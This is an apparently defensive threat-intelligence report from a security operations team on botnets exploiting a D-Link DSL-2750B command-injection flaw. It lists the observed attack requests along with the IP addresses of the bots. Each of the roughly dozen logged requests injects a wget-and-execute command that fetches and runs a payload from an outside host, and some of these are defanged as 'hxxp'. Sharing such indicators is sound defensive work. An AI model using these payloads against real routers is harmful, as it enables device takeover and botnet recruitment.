Tempest´s monitoring team (SOC) identified and reported a variant of the Mirai botnet attempting to exploit five types of vulnerabilities in routers, including D-Link’s DSL-2750B.

The vulnerability related to this model was first disclosed on February 5, 2016, in Full Disclosure, by a Quantum Leap researcher, and allows an attacker to execute unauthenticated commands remotely.

Although the vulnerability is 3 years old, it has been widely exploited by a wide variety of actors. This month, SOC has identified at least 11 botnets trying to exploit this type of router.

Researchers suspect that most of these botnets are part of the malware campaign known as VPNFILTER, reported by Cisco in partnership with Symantec.

According to the report, the malware is capable of collecting sensitive information, tamper with network traffic as it passes through an infected router, and even disabling the device altogether, as well as and maintaining persistence even after rebooting (details of infection stages can be found here).

It is believed that this campaign has already infected more than 500,000 routers from various brands such as ASUS, D-LINK, HUAWEI, LINKSYS, MIKROTIK, NETGEAR, QNAP, TP-LINK, UBIQUITI, UPVEL and ZTE in more than 54 countries.

It is also speculated that its creators have a particular interest in SCADA industrial control systems. In mid-July, Ukrainian officials claimed to have halted an attack on a water treatment company that would have used the threat.

Symantec has made available a tool to verify that a device has been affected by VPNFilter at this link.

Below is a list of the botnets we identified trying to exploit this vulnerability in Brazilian networks:

Payload Source 104.244.72.82
GET /login.cgi?cli=aa aa’;wget hxxp://104.244.72.82/k -O -> /tmp/k;sh /tmp/k’$ HTTP/1.1
User-Agent: Hello, World
Botnet unique IPs adresses:
111.39.106.44
156.204.174.75
192.168.65.76
197.55.82.42
217.57.133.81
31.216.240.171
41.233.60.148
41.36.97.33
41.45.5.125
41.47.163.132
5.98.77.74
91.109.192.66

Payload Source 178.128.11.199–138 times:
GET /login.cgi?cli=aa aa’;wget hxxp://178.128.11.199/qtx.mips -O -> /tmp/rz;chmod 777 /tmp/rz;/tmp/rz’
Botnet unique IPs adresses:
111.168.199.94
112.68.179.151
112.70.128.241
114.180.42.251
114.188.213.89
115.37.18.252
116.64.34.5
117.18.179.32
118.108.73.37
118.111.168.230
118.19.126.68
119.173.57.99
119.229.175.240
119.240.84.96
119.244.248.18
121.112.63.191
121.2.89.121
121.85.84.190
122.197.94.218
123.0.126.94
123.176.158.247
123.198.100.69
123.198.2.20
123.48.141.222
124.141.28.58
124.159.133.2
124.241.170.48
124.246.230.97
124.25.131.117
126.114.212.200
126.119.6.240
126.119.8.141
126.24.149.207
126.90.59.69
128.28.54.186
133.208.242.26
150.147.59.196
151.21.81.82
151.30.64.31
151.40.209.135
151.72.251.181
151.74.22.161
153.129.15.63
153.182.127.162
163.131.120.48
163.131.167.23
163.131.167.23
176.62.58.113
180.11.158.142
180.20.240.24
180.53.69.234
182.165.90.235
192.168.65.76
197.58.24.141
202.231.97.223
203.141.120.105
210.251.184.63
213.13.119.80
217.57.133.126
217.94.23.57
218.217.114.239
218.229.166.151
218.41.195.86
218.47.16.78
219.118.135.245
220.145.30.79
220.211.132.90
220.220.28.220
220.254.160.192
222.150.241.115
223.135.114.142
27.113.192.217
27.141.204.100
27.142.132.247
27.86.59.192
37.97.109.60
47.98.141.123
58.157.32.157
58.158.140.185
58.3.75.159
59.166.42.20
59.168.180.92
60.62.206.60
61.200.76.69
61.23.6.29
61.26.94.245
77.157.30.118
79.44.198.124
80.144.115.148
80.18.66.18
82.127.0.203
83.34.72.238
83.59.82.192
86.205.109.199
87.12.80.173
92.152.212.2
93.237.32.163
94.80.225.50
95.239.128.123

Payload source 185.172.164.41–17 times
GET |{noformat} GET /login.cgi?cli=aa aa’;wget hxxp://185.172.164.41/e -O -> /tmp/hk;sh /tmp/hk’
Botnet unique IPs adresses:
151.33.237.205
151.53.171.253
151.61.83.67
156.208.255.165
156.212.165.224
192.168.65.76
197.38.149.124
41.235.60.227
41.35.212.65
41.43.222.213
41.46.204.218
41.47.6.52
62.103.224.151
93.17.114.2
94.95.85.42

Payload Source 185.62.190.191–107 times
GET /login.cgi?cli=aa aa’;wget hxxp://185.62.190.191/r -O -> /tmp/r;sh /tmp/r’
User-Agent: Hello, World
Botnet unique IPs adresses:
103.234.226.15
106.112.139.150
118.163.105.220
119.18.73.18
123.21.6.128
151.31.12.17
151.66.87.250
151.73.115.199
152.238.136.60
152.238.82.155
152.238.91.91
153.142.239.28
164.77.54.189
168.196.104.213
168.196.105.94
177.222.190.65
177.83.226.19
179.108.39.66
179.108.39.92
179.24.197.49
179.24.65.185
179.25.29.161
181.143.160.146
182.231.148.23
185.104.125.70
187.127.58.118
192.168.65.76
195.158.93.59
200.222.161.49
206.189.125.14
212.103.28.240
212.159.145.223
212.19.124.108
213.167.232.124
213.167.233.123
220.133.230.106
24.103.251.210
37.203.236.29
58.236.33.87
62.99.77.193
73.72.115.42
77.253.229.136
77.69.223.240
81.119.116.122
82.56.190.241
85.211.202.152
87.127.18.60
87.138.108.161
89.120.213.253
89.148.11.57
92.3.30.123
92.8.85.159
92.8.95.119
95.232.4.236
95.236.174.14

Payload source 199.195.254.118–93 times
GET /login.cgi?cli=aa aa’;wget hxxp://199.195.254.118/dlink -O -> /tmp/xd;sh /tmp/xd’
User-Agent: Gemini/2.0
Botnet unique IPs adresses:
109.1.114.155
109.6.107.150
109.6.115.159
109.6.97.43
151.42.114.146
151.51.176.37
151.62.5.151
156.194.160.245
156.194.180.232
156.194.247.106
156.196.107.33
156.196.12.183
156.196.154.214
156.196.178.236
156.197.160.249
156.197.227.229
156.198.101.77
156.198.236.19
156.199.92.159
156.201.186.18
156.202.227.131
156.202.84.15
156.202.90.108
156.203.148.195
156.204.153.20
156.205.244.183
156.208.101.163
156.208.135.147
156.208.18.207
156.212.215.226
156.216.142.38
156.216.228.22
156.216.241.49
156.217.122.39
156.217.231.49
156.218.45.233
156.219.68.186
156.221.101.38
156.222.101.226
156.222.213.234
156.223.212.30
192.168.65.76
197.34.164.96
197.39.182.32
197.39.60.15
197.41.81.206
197.43.201.219
197.54.3.195
197.55.99.16
213.160.161.204
213.26.201.121
213.41.192.17
217.128.171.65
41.237.245.180
41.238.245.215
41.239.218.69
41.45.233.217
41.45.90.138
41.47.50.241
65.39.86.241
78.121.191.22
79.129.59.222
79.129.96.160
80.13.70.186
80.180.57.172
81.10.94.220
84.221.217.162
87.17.180.164
87.2.109.81
87.5.3.50
87.8.249.189
94.143.82.97
94.143.83.203
94.143.86.59
94.70.252.45

Payload source 217.61.6.127–8 times
GET | /login.cgi?cli=aa aa’;wget hxxp://217.61.6.127/t -O -> /tmp/t;sh /tmp/t’
Botnet unique IPs adresses:
206.189.125.14
47.97.6.155

Payload source g[.]mariokartayy[.]com — 4 times
GET /login.cgi?cli=aa aa’;wget hxxp://g.mariokartayy.com/x -O -> /tmp/x;sh /tmp/x’
Botnet unique IPs adresses:
User-Agent: Gemini/2.0
156.218.84.96
192.168.65.76
41.42.165.170

Payload source hakaiboatnet[.]pw
GET /login.cgi?cli=aa aa’;wget hxxp://hakaiboatnet.pw/dlink -O -> /tmp/hk;sh /tmp/hk’
Botnet unique IPs adresses:
User-Agent: Hakai/2.0
179.176.4.0
197.41.119.155
197.44.186.55

Payload source 206.189.168.43
GET | /login.cgi?cli=aa aa’;wget hxxp://206.189.168.43/qtx.mips -O -> /tmp/rz;chmod 777 /tmp/rz;/tmp/rz’
Botnet unique IPs adresses:
80.211.44.120
206.189.229.241

Payload source 185.158.114.160
GET /login.cgi?cli=aa aa’;wget hxxp://185.158.114.160/exploit/mips.exploit -O -> /tmp/mips.exploit;sh /tmp/mips.exploit’
Botnet unique IPs adresses:
175.101.9.29
182.74.239.142
85.15.229.60

Payload source 80.211.84.76
GET /login.cgi?cli=aa aa’;wget hxxp://80.211.84.76/d -O -> /tmp/d;sh /tmp/d’
Botnet unique IPs adresses:
User-Agent: Hello, World
187.65.211.141
185.12.177.63